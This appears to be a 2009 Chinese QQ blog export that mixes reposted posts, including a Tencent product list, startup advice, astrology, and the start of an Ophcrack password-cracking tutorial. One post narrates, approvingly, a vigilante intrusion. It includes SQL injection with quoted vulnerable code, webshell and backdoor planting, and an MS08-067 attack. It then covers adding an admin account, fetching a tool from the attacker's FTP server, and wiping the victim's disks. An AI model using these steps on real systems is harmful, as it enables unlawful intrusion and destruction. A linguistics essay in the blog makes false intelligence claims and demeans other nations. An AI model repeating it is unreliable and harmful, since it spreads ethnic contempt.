X_情義

[转]腾讯十一大成功产品

382135401@qq.com(X_情義) — Tue, 10 Nov 2009 07:02:37 GMT

腾讯公司成立于1998年11月，是目前中国最大的互联网综合服务提供商之一，也是中国服务用户最多的互联网企业之一。成立十一年来，腾讯一直秉承一切以用户价值为依归的经营理念，始终处于稳健、高速发展的状态。临近2009年底，腾讯将迎来它11岁的生日。历经11年沧桑，腾讯已经从当初名不见经传的小企业发展成为了拥有中国最多用户的互联网企业，业务涉及IM、门户网站、游戏、搜索等诸多方面。现在，我们来看看腾讯最为成功的十一大产品。

1、腾讯成功产品第一名：QQ客户端

QQ客户端作为腾讯的产品基础和核心，它的地位无法替代。拥有近10亿注册帐号，3亿多的活跃用户，以至于比尔盖茨也不得不承认，“世界上做得最成功的IM是QQ”。QQ客户端，连接你、我、他。无论你在祖国何方，还是异国他乡，登陆QQ，我们只有一屏之隔。QQ基于文字、语音、视频的网络会议功能，能够满足用户的多种需要，同时大大降低成本。QQ已经成为我们生活中必不可少的通讯工具。

2、腾讯成功产品第二名：QQ空间

腾讯公司于2005年开发出来的一个个性空间，具有博客的功能，自问世以来受到众多人的喜爱。
在QQ空间里写文章、写日记，记录心路历程，是我们宣泄心情的最好方式。QQ空间可以上传保存自己的照片、喜欢的图片，可以收藏、倾听喜爱的音乐，可以尽情的装扮你的网上家园，更是一个交流的平台。我们在自己的天地里，通过各种各样的方式展示自己，彰显品位，结识来自五湖四海的朋友！

3、腾讯成功产品第三名：QQ邮箱系列

作为目前国内邮箱提供商中的佼佼者，QQ邮箱安全、稳定、快速、便捷的强大功能，受到一致好评。目前已为超过1亿的邮箱用户提供免费和增值邮箱服务。QQ邮箱系列的产品正在逐渐深入人心，加上腾讯公司的foxmail客户端及邮箱、邮箱阅读空间、webQQ等产品，QQ邮箱系列几乎趋于完美。QQ邮箱具有完善的邮件收发，通讯录等功能的同时，还与QQ紧密结合，直接点击QQ面板即可登录，省去输入帐户名、密码的麻烦。新邮件到达随时提醒，可让用户及时收到并处理邮件。

4、腾讯成功产品第四名：QQ文件中转站

QQ文件中转站，方便我们在多台电脑间中转文件，一经推出立刻风靡网络硬盘市场，是目前最大最好的免费网络硬盘。这得益于QQ邮箱优秀的服务和使用的便捷，加之QQ提供了超一流的速度。一般用户享有1G存储空间和7天的文件保存时间。QQ会员根据等级，享有更高服务标准：6G无限存储容量、保存时间7—16天。文件可以无限次续期，只要是您认为需要长期保存的，只需每隔一段时间进行续期，就可以一直保存下去。

5、腾讯成功产品第五名：QQ游戏

QQ游戏是腾讯公司开发的棋牌和交友类游戏的平台，用户群广泛，其中大部分都是益智游戏。QQ游戏从欢乐斗地主、连连看到QQ炫舞、地下城与勇士，从跟风模仿到研发独创，QQ游戏作为腾讯四大网络平台之一，目前已成为中国最大的网络游戏社区。QQ游戏，用QQ号和密码就可以登录到QQ游戏中心，无需再次注册；在QQ上点击QQ游戏按钮即可进入丰富多彩的QQ游戏世界；在QQ上直接邀请好朋友一起玩游戏，独乐乐不如众乐乐；游戏有趣好玩、界面活泼亮丽，是年轻人最时尚的选择。

6、腾讯成功产品第六名：QQ群

QQ群是腾讯公司推出的多人聊天交流服务，是QQ软件最重要的功能之一。QQ群的理念是群聚精彩，共享盛世。来自世界各地的朋友，聚在一块聊天，如同生活中的聚会一样惬意。利用QQ群召开会议、采访等都十分便捷。QQ群早已成为我们生活中不可缺少的东西，伴随QQ群的群共享、群空间也都成为了我们交流分享必不可少的方式。

7、腾讯成功产品第七名：QQ秀

QQ秀是一个QQ虚拟形象设计系统，你可以选择QQ秀商城的虚拟服饰、场景和人物形象来装扮你在QQ、QQ聊天室、腾讯社区、QQ空间、QQ交友等服务中显示的虚拟形象。参与QQ秀，我们在互联网虚拟世界中同样可以体验到现实生活的自由和乐趣。红钻用户，全场QQ秀免费用，每天一秀，彰显你的个性与品味。

8、腾讯成功产品第八名：手机QQ

手机QQ是腾讯公司专门为用户打造的随时随地聊QQ的手机即时通讯软件，即使没有电脑，我们照样可以跟好友聊天，语音视频，发图片；还能下载最新铃声，图片；玩游戏。真正方便广大QQ用户。手机QQ一经推出，便立刻风靡手机用户。
手机QQ本身为免费软件，腾讯公司不收取任何费用，但在下载及使用手机QQ的过程中，会产生GPRS流量费用，该费用由运营商收取，腾讯公司强烈建议您开通GPRS包月套餐。

9、腾讯成功产品第九名：QQ图标

QQ图标本不是一个产品，但QQ图标的影响实在深远。任何一项腾讯公司推出的服务，只要是能够点亮QQ面板上的一个图标，便有万千青年趋之若鹜。正是在这趋之若鹜中，腾讯的一项项产品赢得了令人艳羡的用户数量，获得了一个个的成功；而腾讯也在这种QQ图标带来的效应中一次次赚的盆满钵盈。

10、腾讯成功产品第十名：QQ影音

QQ影音简洁清爽的画面，提供多种先进功能，无广告纯绿色版本，一经推出，便彻底将暴风影音推入了太平洋。尽管目前在功能上稍差于KMplayer以及Mplayer，但我们相信，有着腾讯的财大气粗，有着影音小组的不懈投入，QQ影音的成功志在必得。

11、腾讯成功产品第十一名：QQ音乐

QQ音乐是高清正版音乐，发布速度一流，还有简洁的QQ音乐客户端，播放音乐实时显示在QQ客户端上，绿钻用户还能第一时间免费下载高清歌曲，QQ音乐一经推出便迷倒了万千青年。QQ音乐是国内内容最丰富的音乐平台。其独特的音乐搜索和推荐功能，让您可以尽情地享受最流行，最火爆的音乐。只要你拥有QQ音乐播放器，就拥有属于你自己的流行音乐！

互联网领域是技术进步与社会文化生态环境融合、冲突和适应的既虚拟又真实的空间，已经深刻地影响了社会的生产和生活方式。腾讯QQ的各种产品，方便、娱乐着我们的工作和生活，多年来我们与之相伴，不离不弃。在腾讯即将迎来11岁生日的时候，我们祝愿腾讯产品越办越好，更上一层楼！

品牌活动:Qzone亿万网友共同悼念荆州救人溺亡英雄

382135401@qq.com(X_情義) — Sat, 31 Oct 2009 07:29:09 GMT

英雄陈及时校友主页英雄方招QQ空间英雄何东旭校友主页

如果您是QQ校友用户，可点击链接查看逝去英雄曾经来过的地方，如果您还不是QQ校友用户，您需要先注册方可查看.
全国大学生心连心，让我们一起向英雄们致敬!

点击参加

[转]汉语才是最完美的语言，真不明白我们为什么学英语

382135401@qq.com(X_情義) — Sat, 24 Oct 2009 17:53:28 GMT

中国人的思考速度比美国人的思考速度快。因为，中国人的“声音的种类”比美国多。声音的种类是什么？为什么声音种类越多，思维速度就越快？通俗的讲，声音的种类，就是能够发出多少种声音。普通话的一个汉字是一个声音。英文的一个单词是若干个声音。

英语有20个元音20个辅音没有声调，所以，英语的声音种类不会超过20×20＝400个。也就是说，如果一个声音对应一个事物，那么，英语的400个声音只能表达400个事物。这400个事物之外的事物，如果要表达，就只能靠声音的重复才行，用2个或者3个声音表达。普通人的一个声音约需1/4秒。可见，美国人要表达第401种事物，就需2个声音，耗时1/2秒。而中国人表达1200个事物，只需1个声音，耗时1/4秒。下面会说到。

普通话有20个声母39个韵母和4个声调，连乘的结果大约是3000个声音。能被利用的是2500个声音，普通话中真正用到的是1200个声音。所以，中国的普通话想表达1200个事物，只需1个声音，耗时1/4秒。
曾有人比较过，用英语和汉语背诵乘法口诀的速度：汉语用了30秒，英语用了45秒。因此，两人同时背诵乘法口诀。30秒的时候，汉语使用者一定想到了九九八十一，而英语使用者肯定想到不了这里，可能也就是七七四十九。这就说明了：声音种类多的语言的使用者比声音种类少的语言的使用者思考速度快。普通话的声音种类多于英语，所以，中国人的思考速度比美国人快。相同时间，思考速度快的人，自然能够思考更多的问题，当然也就更聪明。一些研究结果显示：中国人最聪明的原因就在这儿。这是中华民族的先天优势。最明显的对比就是日语与汉语。日语使用了100种声音，汉语使用了1200种声音。因此，很多汉字让日本人念，就必须用两个或者三个声音来表达（日本人说话好累）。假设：一个汉字对应日语的两个声音，那么，日本人一生能够享受到的信息，只有中国人的一半。日本先天不足，可能就是日本永远当不了世界的老大的原因。

现在，英语单词的数量，已经超过百万了。惊人而可怕，普通人一辈子也记不完的。而这些单词都可以用四千个汉字表达。真庆幸，笔者生在中国而不是美国。

为什么会英语单词的数量会如此之多呢？下面咱们具体看看。英语里，猪肉（pork）和猪和肉（pig，meat）没有丝毫关系。猪肉羊肉牛肉（pork，mutton，beef）也没有些许联系。公鸡是cock，母鸡是hen，小鸡是chicken，这就是鸡的一家子。能看出公母和大小吗?彼此毫无关联，真是愚蠢，让人受不了。不难发现：英语里的多重名词和它的分解词没有丝毫关联。英语词汇的主体就是这样的。新事物出现，新词汇发明，新词汇还与原有词汇基本无关。上百万的英语单词就是这样出来的。突然感觉：英语好笨哦。再想想咱们的汉语，基本不必发明新汉字，仅仅依靠原有的汉字组词就可以了。真是感谢和佩服充满智慧的祖先。

汉字能够灵活组词的功能太重要了。它让我们可以触类旁通，记忆量大大地减少。看看下面这个例子。汉语里：火箭，不就是火推动的箭么？计算机，不就是会计算的机器么？不同组合就表达了不同事物。伟大而让人轻松。英语呢？有了火箭，就得产生个新词ROCKET；有了计算机，就得来个COMPUTER。记忆量大呀，好累人哦。瞧瞧，这就是差距。越了解这些，越感到作为中国人的自豪和幸福。

有人可能要问：英语也可以将pig和meat连起来啊，这样就可以减轻记忆了啊。好问题。接着咱们来看看，到底能不能按你说的做。现在不用pork了，猪肉用猪和肉pigmeat来表示。这样一来，猪肉pigmeat就要发音四次，而pork仅仅发音两次。可见，连体词无需记忆却增加发音次数，新词汇节省发音却增加记忆。英语没法两全。如果英语的新词汇都采用连体形式，那么新词汇会有多长？你可以想象一下。这样的话，美国人说1句话该发音多少次啊？不累死才怪呢！

接着往下看。现在的中国学生，可以琅琅上口地读2000年前的诗人屈原的楚词。这种文字的稳定性，是智慧传承的基础。有了这种稳定的文字，才能读懂自己远祖的文明，才能不断的继承和进步。英语就做不到，因为太不稳定了。现代人读莎士比亚的原著已经困难重重了，更不用说2000年前了。

此外，英语和汉语还有一些特点，是需要说明的。英语是“一维的”和“密码式的”语言。语言的一维性，导致美国人的思维是直线式（线性）的。这种直线式思维，对美国人产生了非常深远的影响：做事方式直接，绘画喜欢用直线等。语言的密码性，导致语言抽象而费解，美国300万患失读症的儿童（智力正常）就是受害者。中国的小孩，只要智力正常的，很少有患失读症的。因为，汉语是“二维的”（纸面上的最大维数）和“形象的”语言。语言的二维性，使得中国人的思维是曲线式（面性）的。每个汉字都是一幅画，不仅容易理解，而且获取信息的速度比密码快N倍呢。获取相同信息，花费的时间更少，当然也就更聪明。（先天优势）
同样的场景，美国人倾向关注中心物体而忽略背景（一维的思维导致的），而中国人关注物体更注重整个场景（二维的思维造就的）。

忽略背景，使得美国人看问题：深刻却片面。看问题片面的人，容易一根筋，使得做事成本过高。这就是美国的研发成本高的内在原因（美国人未必意识到了）。

注重场景，使得中国人看问题：全面且懂得变通。看问题全面且会变通的人，做事自然容易做得好。因为，事情看得透彻，复杂的问题也会变得简单。这就是中国的2弹1星等奇迹产生的内在因素。很多在西方人看来，根本不可能的事情，中国都变成了现实，原因就在这儿。这是中华民族的先天优势。

有人曾问过几个教授：“长方体”如何用英文讲？结果，这几位母语是英文的工科教授都不知道。又问了几个研究生，他们也不知道。（吃惊？）“四环素”、“变阻器”、“碳酸钙”、“七边形”、等词只有专业人才才会。根本不像汉语能够触类旁通。（傻了？）普通美国人，掌握这些词汇都是问题，更别说用它们自由交流了。在美国想做个博学的人，实在是太不容易了。词汇量就是个大问题。这就是美国有那么多愚蠢无知的人（布什之流）的原因。英文世界里，没有20000个字别想读报，没有30000个字别想把《时代》周刊读顺。大学毕业10年的职业人士一般都懂80000字。汉字就不多说了：国家的扫盲标准是1500字，理工科的大学生一般掌握三四千汉字，搞科研都没问题的。至于读书看报更是小学毕业生都可以做到的。一句话：做中国人---爽。（来源于：智慧的辨思：最优秀的语种汉语）

想想看，美国人学习了2万单词，他能享受的信息还是有限的。中国人学习三四千汉字，就可以享受几乎全部信息。学少而知多，投资收益率惊人得高呀。什么是智慧？这就是智慧。

“有件事，我不明白。你说汉语更优秀，为什么中国的文学作品却没法翻译成英语？”好问题，赞一个。中国的文学作品没法翻译成英语，英语的文学作品却能翻译成汉语。这种现象说明：英语表达的思想，都能找到对应的汉语表述；而汉语表达的思想，不一定能找到对应的英语表述。是不是这个理？ “是的。”如果你学过数学，知道集合和真子集，就会明白。这种现象说明：英语是汉语的一个真子集。英语能够表述的思想，只是汉语的一部分。英语是有缺陷的，很大的缺陷。相比之下，汉语就完美多了：能用更少的字表达更丰富的思想。大家对汉语有误解，才会出现这种情况：将优秀当差劲。由于国力和历史的问题，很多人的脑子里，有一种观念：西方的东西更好些。这种先入为主的观念是要不得的。这种观念，让我们的国家吃了很多亏。该反思和反省了。为了自己，也为了国家。丢掉那种歧视祖国的观念吧。

有资料表明：说汉语比说英语能更多得使用右脑（天才脑）。先天方面，中国人比西方人有着更多的优势。老祖先留下来的，真是好东西呢。只是，自以为是的现代人理解不了。突然想到一句话：肤浅的人喜欢从肤浅的角度看待深刻的人；愚蠢的人喜欢从愚蠢的角度看待智慧的人。满有意思的。

在语言方面或者说先天优势，美国人输给了中国人，犹太民族也输给了中华民族。当然，这不是我们优秀，而是我们的祖先太优秀了。感谢和佩服！然而现在，很多人漠视甚至鄙视自己的文化。让人很无奈。笔者的看法：未来的，真正意义上的，世界语将是汉语。

理解了汉语是智慧的语言，再看那些：整天忙着去汉字化的韩国越南等，你就会一笑了之。因为，去汉字化是极其愚蠢的。这样做，不仅抛弃了他们用汉字书写的历史，更会让他们民族变得肤浅和狭隘。他们是在自掘坟墓。等他们碰得头破血流的时候，就会明白，就会回头了。那时，他们的麻烦会更多。笨蛋就是这样炼成的。
“你说的这么好，可我还是不明白：近代中国为什么会落后呢？” 想知道真相吗？看这里：《智慧的结晶：国人自卑与丑陋的根源探》。你会得到明白而清晰的答案。百度一下就可以了。

全球摄像头在线直播

382135401@qq.com(X_情義) — Fri, 23 Oct 2009 16:54:19 GMT

今天无意间发现个好玩意嘿嘿全球摄像头在线直播街道围墙高速路办公室海边等等
想看哪就点那不信的可以去看下
http://178i.com/kan.htm
http://guainiao.com/realworld/
这是网站主页：绿色工具网
http://178i.com/

[转]30而立，80后在经济危机中敢创业吗？

382135401@qq.com(X_情義) — Thu, 13 Aug 2009 19:50:58 GMT

男人30而立，80后今天已经接近30边缘，恰在此时是经济危机的时期，是默默无闻还是单独创业？
80后是一个思想另类的群体，无论是事业上还是行为上，都与前年龄段的人不同，然而无论是任何年龄段的人，生存都是同样的，就像死亡游戏一样，过关的人生存，而失败的人则淘汰出局。生活便是这样，经济危机之下，80后还敢创业吗？
记得很小的时候，同村就有很多小学未毕业的同龄人就去打工，他们带回来的是外面精彩的世界，令很多读书的学生很追求。作为80后，这些人现在有的仍然在打工，有的回来修了楼房做起小生意，有的则混上了公务员，但单独创业的，在农村中似乎机率很少。在大家的心目中，能过上日子的人，也就算是成功人士了。
30而立，指的是在30岁时有所作为。这句话也许是勉励大家要去为事业而奋斗，也许是对一个人的智商作一种肯定，但对于大部分人而言，它是虚拟的。因为现实生活有很大的差距，创业除了要有智力，还要有勇气。
有专家分析了创业的几种前期筹备：
第一，要赢利；创业是为了什么，当然是赢利，问题是你怎么赢？在第三产业中，早已达以饱和状态，倘若要去发展，肯定要借鉴，为此商业调查很重要，还要通过亲友、前同事、同学等社会关系，咨询他们的意见，比如说开店要计划什么价格客户能接受等等。
第二，要有眼光；坚持自己的品牌信念，对自己的事业要有长远的眼光，要权衡上前的利弊。创业容易守业难，无论大小事业，都要根据市场经济来顺水而行，不能一意的孤行。
第三，要正确对待加盟；现在的加盟很热，什么餐馆、理发店等加盟广告铺天盖地，真的能赚钱吗？说穿了，这就是一种合作，主要是牺牲你的利益为代价的。为此，为了让每一块钱都落入到自己的口袋里面，就需要你自己辛苦一点了。
第四，不要急着过老板瘾；很多人在生意走上正道的时候，或是正开始的时候，就找了很多员工，当起了老板。十万以下的投资者，应该发扬艰苦奋斗的精神，先实现自我雇佣，自我投资，减少成本。
第五，不要带着情绪；离开单位，是因为不开心，得不到重要。为此，要当一把手。这样的情绪固然可以维持一段时间，也是一种激励，但有时候会造成对市场信号的不敏感，或是用一种赌博心理孤注一掷。
第六，要面对创业失败；如果创业失败怎么办？这是大家最担心的一个问题。可又想，不去做怎么知道成功与失败呢？当然，失败的可能是多年的积蓄，可能是现在稳定的工作，但一定要仔细想一下当初为生命出来自己做的原因。失败也并非一无所有，至少拥有了宝贵的经验。
请认真总结上面的话，或许能给你的创业带来很大的作用。
为此，我认为，80后单独创业的机会比以上年代的都要多都要强悍，30而立对于大家来说，或许是一种责任，或许是一个正在犹豫不决的决定。那么，有钱为什么不去赚呢？
30而立，最重要的并不是有什么样的事业，而是一个人怎么样的去面对人生。一句玩笑话：美丽的女人，也许会嫁给一个修自行车的老板，也不愿意嫁给公务员。

[转]入侵钓鱼挂马站&入侵钓鱼者

382135401@qq.com(X_情義) — Thu, 09 Jul 2009 14:36:29 GMT

某天，我的QQ滴滴滴的响了起来。“我被一个钓鱼网站骗了钱，可以帮帮我吗？”
又是一个被钓鱼网站诈骗了的兄弟，发挥下黑客的精神，就去看看吧！
对方把钓鱼的网站发了过来，http://consigamont5173.com/dcvail/JS066-20090206-86621134.shtml呵呵，做的还挺不错的吗（图1），

5173的钓鱼站，做的不错，但是直接访问网站根目录http://consigamont5173.com/，返回的却是一个目录禁止显示的提示，访问http://consigamont5173.com/dcvail/，到来了个西安西拓电气有限公司，晕啊，看来这个钓鱼站还是用二级目录来做的，我真的佩服被骗了的朋友，这种技术的网站也会上当。废话少说，马上就来检测了这个站。
后台很容易就找到了http://consigamont5173.com/dcvail/admin/login.asp，默认的用户名密码都不起作用，而且后台没有一点信息可以利用，又绕了一圈，没有什么漏洞可以利用的，就放弃了直接入侵。
一个站无法直接下手就采用旁注。我找了N多个站，看到个CMS系统的内容站，连接都是动态的，也有防注入的功能，但是怎么都觉得用的不是什么很好的程序，往往漏洞就是用感觉出来的，(*^__^*)…。顺手后面加了个/admin，马上就提示我没有登陆，顺便把我转向了管理员的登陆页，登陆页右下角醒目的写着“LeadWit WS 3.0(ACCESS免费版)”（图2），

虽然这种系统我一次没有用过，但是我可以百度么。很快，就在邪八找到了一篇帖子，关于该程序有一个注入漏洞，注入漏洞是adminChannel.asp文件有问题。这个文件在admin文件下的，下面给出adminChannel.asp部分代码看下
‘定义变量
dim ChannelID,AdminID
dim rs,rsa
ChannelID = request("ChannelID")
AdminID = request("AdminID")
’进了SQL
Set rsa = LZ8.Execute("Select * from ["& AdminTable &"] WHERE id="& AdminID &" order by id")
Set rs = LZ8.Execute("Select * from [LZ8_Class] WHERE ChannelID="&ChannelID&" order by RootID,OrderID")
if not rs.bof and not rs.eof then
do while not rs.eof
%>
两个变量都没有过滤呢~我们可以在URL后加上：/admin/adminChannel.asp?AdminID=1&ChannelID=1，可以直接注入。一不做二不休，马上构造了个注入的地址，放到啊D里跑了起来，当然提示存在注入点咯，不过，管理员表段怎么都猜解不出来，没事，去网上down了这个站程序，研究了下数据库，呵呵，管理员表段是LZ8_Admin，奇怪的表段，没事，在啊D里添加了这个LZ8_Admin，马上就跑出了4个管理员用户密码(图3)，

人品不错，四个MD5加密的密码解出了一个，能登陆后台就成。
后台还没有仔细的转悠一圈，就发现了这个后台根本不堪一击，上传个改成了jpg的小马，通过数据库备份功能成功的获取了该站的shell（图4）。

有很多朋友看到这里就会说了：那这个钓鱼站肯定就是通过这个站旁注拿下的吧！非也。我进入了webshell，权限很低，上传的aspx大马打不开，wscript.shell也为禁用的状态，转了一圈根本没有办法提权，只有宣布旁注失败。
目光继续回到了钓鱼站的后台，无聊的给它登陆页的admin目录后面加目录，都是些常用的目录，加了个upload回车返回的是“目录不能显示”，我马上来了精神，经验告诉我，在admin目录下的upload文件夹通常是由XX编辑器上传的文件。立刻在admin后面加了个ewebeditor，返回“无权查看”，那就是存在的意思了！要是ewebedit的登陆页面也没有删除就最好了！继续加admin_login.asp，哇~~通红的ewebedit登陆页面一下弹开在我的面前（图5），

有戏，默认的用户密码不起作用，好在可以下载数据库解破么！数据库的目录是db/ewebeditor.mdb，不错，数据库没有修改位置，顺利的获取加密的md5密码，cmd5解密也出来的密码jia717（图6），

登陆ewebedit，增加样式，加了个文件格式asa，上传小马，成功拿下！！！（图7）。

对于这种网站，我的做法就是马上废了它，数据都给删除，一个不留，不过又想了下，数据是删除了，谁保证这些人没有备份，刚刚删除马上就又给恢复了怎么办，而且还把漏洞给修复上，那这么多工作不都白费的么？不行，咱们给它继续搞。
再次登陆webshell的时候已经是第二天了，怎么？我的webshell被删除了？一种不详的预感笼罩着我，这么快就被管理员发现了？？幸好我还有一个留在正常文件里的后门，要通过在asp文件后面加参数才可以显示，不过不幸的是这个后门也被删除了，这个管理员倒是挺厉害的嘛，可以发现我的后门，不知道漏洞修补了没有。
再次进去ewebedit，上传文件，这次运行马与以往不同了，显示：禁止运行ASP等活动脚本。晕咯，管理员还通过IIS对上传目录限制了运行啊，上传上去运行不了，麻烦事，无论怎么上传都是无效，昨天的战果就这样没有了么？？？不行，还要继续渗透。
昨天的入侵留下了好的习惯，把整站都打包下载了回来，现在渗透正好用的着。打开了数据库看了下http://consigamont5173.com/dcvail/admin/login.asp的登录密码，成功登陆进去，想不到这个里面也有数据库备份功能（图8），

测试了下，admin与这个备份功能定义的data文件夹是在同一个目录下，这就好办了，用ewebedit上传图片马，然后用这个后台备份功能转化webshell，我就这样传了个jpg的马，然后数据库备份功能转化了后缀，马成功生成了在http://consigamont5173.com/dcvail/admin/databackup/1.asp，访问，结果却还是显示禁止活动脚本运行，难道永远都不可以让马活起来么？答案是否定的，限制活动脚本运行可以对指定的目录设置，但是对于一些新产生的目录就无能为力了，备份功能的备份目录就起了作用了，我定义一个新的文件夹名，相信新的文件夹肯定可以运行这样的活动脚本吧！不出所料，这次我使用了123文件夹为备份的目录，备份功能乖乖的新建立了一个123文件夹，把我的Jpg小马也转化成了asp，呵呵，二次渗透成功（图9）。

一鼓作气，目标钓鱼者的计算机！！！首先是要获取对方的IP地址，没有什么很好的方法，就在CNZZ生成了一个统计的代码，可见就可以见吧，懒得去阿里妈妈生成隐藏的统计代码了，当然隐藏的更好，但是我现在就要一鼓作气，拿下对方！统计代码只查入在http://consigamont5173.com/dcvail/admin/login.asp这个页面，只要对方一打开这个页面，他的IP地址就会被记录下来，我要做的就是在CNZZ的后台守株待兔就可以了。
这人品说好还就是好，CNZZ的后台马上就记录了打开login.asp用户的IP（图10），

尽快，如果对方是ADSL的话，重新拨号就会改变这个IP，想追踪到就会很困难，何况这个统计代码是这么的明显。
现在面对的是很多小菜的一个问题：怎么指定入侵IP的计算机啊？虽然问题很弱智，但是方法还是有的，就是看看对方的计算机有没有什么微软的最新漏洞可以远程执行代码（想必对方也不会使用Linux系统的，呵呵）。
去网上找了一番，也就MS08067这个漏洞最新了，当时这个漏洞利用工具出来的时候，有多少计算机被成功的溢出，不知道今天运气有没有这么好，试试看吧。
把溢出程序下到硬盘上，Cmd下执行ms08067 116.*.*.229，开始远程溢出，结果谁也没有想到我会这么顺利：溢出成功！！！（图11）

溢出成功，telnet连接，返回了对方的cmd shell，还等什么呢，马上net user tony 123 /add，net localgroup administrators tony /add，对方的机器中添加了一个tony的用户（图12），

好的木马我没有，因为我还不会免杀，咱可以用3389连接么，我这里正好有一个开3389的工具，对方的系统如果是XP，则自动会双开3389，其实只要拿到了cmd shell基本就可以确定这台计算机已经被控制了，马上使用了FTP命令从自己架设的FTP空间中下载并运行了这个3389.exe。
如果不出意外，对方的3389远程登陆服务已经被打开了，现在剩下的就是要登陆对方的机器咯！！！
登陆成功，确认是钓鱼入侵者之后（图13），

然后嘛，黑吃黑，洗劫一番，然后用自己的工具粉碎性格式化对方的磁盘，留下个文本：哈哈，钓鱼害人也害己哦

最多富豪的星座排行榜

382135401@qq.com(X_情義) — Sun, 14 Jun 2009 06:37:12 GMT

最多富豪的星座排行第一名：处女座 (专业富豪)
　　真是一个让大家意想不到的星座，但是全世界的富豪统计，最多的真的是处女座！事实上，这个结果并不
让人意外，处女座的人十分在意自己的工作表现和社会认同，通常也会从事非常专业且社会地位颇高的职业，
而这一类的职业本身收入就已经颇为丰厚，除此之外，处女靠着专业知识晋升上流社会的机会也比其它星座高
出许多，当然十分接近富豪天堂！另外，处女座也是非常在意对生活质量的追求，这样的动力会让处女座更加
辛勤地工作，让原本就已经是工作达人的处女座更加快速接近成功的条件。光是工作成功也并不一定会成为富
豪，处女们还有一项天生的天赋，对金钱非常有概念！处女们不见得像金牛们着重在财富的累积，通常财富只
是工作成就的副产品，但是处女们天生对金钱价值的嗅觉非常敏锐，让大部分的处女们懂得节省的艺术，又能
开源又能节流，处女们常常在无意之间就存起了一大笔财富喔！
最多富豪的星座排行第二名：天蝎座 (计划富豪)
　　说天蝎有最多富豪的星座排行，还排名第二，相信天蝎们自己都会否认，但是天蝎身边的亲朋好友一定拼
命点头。天蝎们说真的并不是一个爱钱的星座，对天蝎来说，这世上有太多太多比金钱让天蝎们更看重的东西
，天蝎一生所追求的并不是金钱，而是旁人完全不能理解的抽象的天蝎专用人生价值观。天蝎们不爱钱，但是
天蝎们很可能把金钱当成一种工具，去完成他们内心真正想达成的目标，而且，当天蝎们决定要有钱，天蝎们
必定会做到！凭什幺当天蝎们想要有钱就必定做得到呢？其实天蝎们的脑袋冷静有逻辑，非常适合理财分析，
事实上，当水星落在天蝎座，正是理财大师们最常见的必备星象之一。除此之外，天蝎行事非常谨慎，思维细
密严谨，出手前一定会做好最完整的沙盘推演，务求百发百中，就算一开始经历挫折失败，天蝎们好强要面子
，字典里几乎没有认输两个字，要赚钱，就一定要赚个够才会收手的啦。
最多富豪的星座排行第三名：天秤座 (社交富豪)
　　天秤座与富豪的距离，似乎天生就比较近！最主要的动力在于，天秤们终生追求优雅美丽的高质量生活享
受，要过这样的生活，没有足够的财力是不行的。因此，天秤们就算自己不是出生在富豪家，从小就开始留意
各式各样的致富之道，包括嫁入豪门啦，选择高薪的职业啦，学习股票经啦，房产买卖啦，各式各类的知识。
然而，天秤们其实大多对这些理财并不太在行，数学观念也不够好，天秤们真正致富的快捷方式，是在学习理
财的过程中，认识许多真正的富豪们或是有地位的上流社会成员。神奇的是，天秤们面对富豪和上流社会丝毫
没有自卑心态，以一种未来富豪的姿态，常常让上流社会对天秤们的接受度极高，经由社交的途径，天秤们从
富豪的世界中所学习到、接触到的可不是一般人的理财经验与信息，自然而然地就成了名列富豪排行的其中一
位啰！
最多富豪的星座排行第四名：魔羯座 (老板富豪)
　　魔羯座可以说是完全不显眼的富豪群，是一群在社会上完全容易被忽略的一群人。主要原因固然是因为魔
羯们原本就不爱吸引别人的注意，更重要的原因是，魔羯们成为富豪的途径通常是在同一家公司从基层开始做
到老板，既然已经在同一家公司待了数十年，大家当然不会特别注意到魔羯座的富豪成功之路。然而，魔羯座
的富豪之路可以说是最稳健保守的一条道路，魔羯座靠着认真工作又保守节俭，几乎个个都拥有成功的事业与
优渥的晚年。魔羯座富豪唯一的缺点是，致富的过程几乎需要一辈子的时间，等到当上大老板，有头有脸有钞
票，几乎都已经年过半百，甚至七老八十，因此，魔羯富豪们通常并没有真正享受到富豪人生，于是，当魔羯
富豪们站上这个人生的顶峰时，他们并不会以富豪的身分自居，他们眼中看到的风景是自己一辈子的奋斗与成
就感。
最多富豪的星座排行第五名：金牛座 (保守富豪)
　　金牛座是占星理论中的最多富豪的星座排行第一名，但是在现实生活中，或是说在现代的社会中，真正能
够成为富豪的金牛并不如想象中多。原因是金牛座对于金钱太在意，保守有余，开创不足，常常是为了不想损
失一块钱，宁愿放弃赚百万的机会。在过去保守社会中，没有这幺多五花八门的理财方式，银行存款是唯一的
衡量标准，金牛座在过去通常是银行存款大户，这也是”金牛”名称的来源。但是在现代的社会中，富豪的条
件不只是累积财富，大把金钱的更大来源是各式各样的理财途径，以及大型企业的经营，然而这些都不是保守
金牛的强项。对金牛们来说，每一分钱都实实在在握在手上才是财富，对风险过高的理财方式兴趣缺缺，也不
愿意把银行的存款转换为时有时无，七上八下的股市数据。单单靠着存款的累积要成为富豪是比其它星座都辛
苦的道路，但是，神奇的金牛也的确有这个本事，就是会过着”不差钱” 的一生。原本就出生在富豪家庭的金
牛不用说，完全能够守财，继续当富豪，出生平凡家庭的金牛也几乎个个能够以各种攒钱的方法，累积起一定
的小康财富，这才是”金牛”最厉害之处呢！

本文来自: 星空有你网站(www.xkyn.com) 详细信息请参考：
http://www.xkyn.com/starrysky/lucky/starrysky_7384.htm

[转]使用Ophcrack破解系统Hash密码

382135401@qq.com(X_情義) — Fri, 17 Apr 2009 07:33:47 GMT

使用Ophcrack破解系统Hash密码
2009-01-04 20:13
最近应antian365团队的安全课题研究，我负责进行系统口令攻防密码破解子课题的研究，不研究还不知道，研究后感觉在安全的领域，越是深入，越是感觉自己了解的东西太少，在密码破解上，平常用得最多的是LC5，关于使用LC5如何破解口令，请看团队撰写的《系统口令安全与审计》，LC5破解时间相对较长，一直以来俺都沾沾自喜，感觉自己密码破解方面还是不错的，可是通过本文的研究后，我彻底的无语了，一个不超过14位的系统密码一般不超过5分钟，绝大多数仅仅需要几十秒中，这意味着当一个系统存在漏洞时，可以在很短时间内控制并渗透内部网络！下面就将本人研究过程和研究方法跟读者朋友一起分享，也欢迎致力于网络安全的朋友加入到antian365研究团队中。（一）查找资料
1.通过网络搜索引擎查找资料
在课题研究过程中最重要的就是查找资料，查找资料的途径主要是通过网络搜索引擎，去发现前辈们公布的研究结果。我首先通过Google在其搜索款中输入“Ophcrack”，然后选择“中文网页”，最后单击“Google搜索”，如图1所示出来有294000多条记录，看来“Ophcrack”还是比较流行的，威力巨大可见一斑！

2.获取有关课题有用的研究资料
